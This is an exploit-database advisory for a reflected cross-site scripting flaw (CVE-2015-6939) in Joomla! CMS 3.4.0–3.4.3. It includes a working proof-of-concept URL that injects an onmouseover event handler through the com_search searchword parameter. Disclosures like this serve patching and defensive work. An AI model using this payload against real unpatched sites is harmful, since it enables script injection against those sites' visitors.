Joomla! CMS 3.4.3 Cross Site Scripting

2015-10-09T00:00:00
ID PACKETSTORM:133907
Type packetstorm
Reporter cfreer
Modified 2015-10-09T00:00:00

Description

                                        
                                            `# Exploit Title: Joomla! CMS 3.4.0-3.4.3 XSS Vulnerability  
# Date: 2015-08-18  
# Exploit Author: cfreer (byfreer@gmail.com) & 0keeteam  
# Vendor Homepage: http://joomla.org  
# Version: 3.4.0 through 3.4.3  
# Tested on: Apache/2.4.7 (Win32)  
# CVE : CVE-2015-6939  
  
  
Description  
  
Inadequate escaping leads to XSS vulnerability in login module.  
  
  
Affected Installs  
  
Joomla! CMS versions 3.4.0 through 3.4.3  
  
  
POC:  
http://localhost/joomla/index.php/?Itemid=11&option=com_search&searchword=%f6%22%20onmouseover%3dprompt(3312)%20//&task=search  
  
  
  
=============================  
Reported Date: 2015-August-18  
Fixed Date: 2015-September-08  
=============================  
  
  
referer:  
http://developer.joomla.org/security-centre.html  
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6939  
https://github.com/poc-lab/exp/blob/master/CVE-2015-6939  
`